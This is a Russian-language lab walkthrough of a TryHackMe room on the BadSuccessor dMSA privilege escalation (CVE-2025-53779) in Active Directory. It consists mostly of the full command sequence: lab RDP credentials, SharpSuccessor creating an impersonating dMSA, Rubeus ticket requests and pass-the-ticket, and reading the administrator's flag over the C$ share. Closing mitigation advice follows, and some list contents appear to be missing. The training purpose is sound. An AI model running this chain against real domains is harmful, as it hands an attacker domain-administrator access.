
Комната TryHackme, посвященная эксплуатации CVE-2025-53779 с использованием Windows
В этой комнате мы исследуем технику повышения привилегий BadSuccessor — уязвимость, связанную со злоупотреблением делегированными управляемыми учётными записями служб (dMSA) в Active Directory. Атака позволяет пользователю с достаточным контролем над объектом dMSA выдать себя за другую учётную запись и потенциально получить привилегии администратора домена.
Комната: https://tryhackme.com/room/adbadsuccessor
Сложность: Средняя
Дата: 05.06.2026
Версия: 1.0
Цель: Продемонстрировать, как делегированные управляемые учётные записи служб могут быть использованы для повышения привилегий и компрометации среды Active Directory.
Роль: Terry Byte (tbyte)
Задача: Оценить безопасность недавно развёрнутой среды Active Directory и определить, уязвима ли она для атаки BadSuccessor.
Атака состоит из двух основных этапов:
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
Перейдите в каталог Proof-of-Concept:
cd C:\PoC
Проверьте содержимое: dir
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
notepad Get-BadSuccessorOUPermissions.ps1
.\Get-BadSuccessorOUPermissions.ps1
Используйте SharpSuccessor для создания делегированной управляемой учётной записи службы, которая выдает себя за учётную запись Администратора:
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
Что происходит?
Используйте Rubeus для получения делегированного билета предоставления билетов (TGT):
.\Rubeus.exe tgtdeleg /nowrap
Команда возвращает билет Kerberos в кодировке Base64.
Скопируйте полученный билет.
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Результат:
Новый билет Kerberos внедряется в память для учётной записи dMSA.
Используйте билет dMSA для получения доступа к службам, работающим в контексте Администратора:
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Результат:
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
Прочитайте флаг, хранящийся на рабочем столе Администратора:
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
Флаг успешно получен.
BadSuccessor демонстрирует, как делегированные управляемые учётные записи служб могут создавать пути повышения привилегий в средах Active Directory. Active Directory служит основой идентификации для многих организаций, и уязвимости, затрагивающие Kerberos и делегирование учётных записей, могут иметь серьёзные последствия.
Злоумышленник, имеющий достаточные разрешения на объект dMSA, может:
Для смягчения уязвимости BadSuccessor (CVE-2025-53779) организациям следует своевременно применять обновления безопасности от Microsoft, ограничивать и проверять разрешения dMSA, мониторить подозрительную активность Kerberos, аудировать отношения делегирования и соблюдать принцип минимальных привилегий. Регулярная проверка настроек делегирования Active Directory может помочь выявить и уменьшить потенциальные пути повышения привилегий.
Эта комната предоставила ценный практический опыт в следующих областях: